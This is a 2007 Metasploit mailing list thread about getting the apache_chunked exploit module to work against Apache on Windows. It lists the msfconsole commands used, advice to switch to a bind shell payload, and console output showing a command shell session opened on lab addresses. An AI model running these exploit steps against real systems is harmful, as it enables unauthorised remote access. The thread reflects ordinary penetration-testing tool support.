Metasploit mailing list archives

Problem with Apache Win32 Chunked Encoding

From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Thu, 1 Nov 2007 13:57:43 -0600

Your PAYLOAD won't work with CMD=calc.exe.  You're exploiting a service
that doesn't have a GUI component attached and so you won't get a
response back when you fire the exploit at it.

Use a different PAYLOAD like windows/shell/bind_tcp instead.

On Thu, Nov 01, 2007 at 09:18:26AM +0100, bluefoxy wrote:

Thank you Patrick, I try to setting VHOST, but not working.
I try both in VMware and on  a real network, some error.

My command's list is, Apache is in 192.168.1.80, metasploit in 
192.168.1.30:

use windows/http/apache_chunked
set RHOST 192.168.1.80
set LHOST 192.168.1.30
set VHOST 192.168.1.80
set TARGET 4
set CMD calc.exe
set PAYLOAD windows/exec
exploit

Can you list your command's list?
Thanks.

bluefoxy



Patrick Webster ha scritto:

Are you sending traffic via a transparent proxy? You may need to set VHOST 
to get past it.

Works ok here - though a different target.

msf exploit(apache_chunked) > rcheck
[*] Serer is probably not vulnerable:
[*] The target is not exploitable.
msf exploit(apache_chunked) > rexploit
[*] Started reverse handler
[*] Trying Apache.org <http://apache.org/> Build 1.3.9-> 1.3.19 [ 
0x00401151/6 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [ 
0x00401151/2 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [ 
0x00401151/0 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [ 
0x00401151/4 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [ 
0x00401151/1 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9- >1.3.19 [ 
0x00401151/3 ]
[*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [ 
0x00401151/5 ]
[*] Command shell session 1 opened ( 192.168.146.12:4444 
<http://192.168.146.12:4444/> -> 192.168.146.13:1050 
<http://192.168.146.13:1050/>)

-Patrick
------------------------------------------------------------------------

No virus found in this incoming message.
Checked by AVG Free Edition. Version: 7.5.503 / Virus Database: 
269.15.12/1098 - Release Date: 29/10/2007 9.28


-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."

Current thread:

Problem with Apache Win32 Chunked Encoding bluefoxy (Oct 30)
- Problem with Apache Win32 Chunked Encoding Rhys Kidd (Oct 30)
  - Problem with Apache Win32 Chunked Encoding bluefoxy (Oct 30)
    - Problem with Apache Win32 Chunked Encoding Rhys Kidd (Oct 30)
    - Problem with Apache Win32 Chunked Encoding bluefoxy (Oct 30)
    - mcafee Entercept Weston, David G. (Oct 30)
    - mcafee Entercept H D Moore (Oct 30)
    - Problem with Apache Win32 Chunked Encoding Patrick Webster (Oct 30)
    - Problem with Apache Win32 Chunked Encoding Mr Gabriel (Oct 31)
    - Problem with Apache Win32 Chunked Encoding bluefoxy (Nov 01)
    - Problem with Apache Win32 Chunked Encoding Kurt Grutzmacher (Nov 01)
    - Problem with Apache Win32 Chunked Encoding Patrick Webster (Nov 01)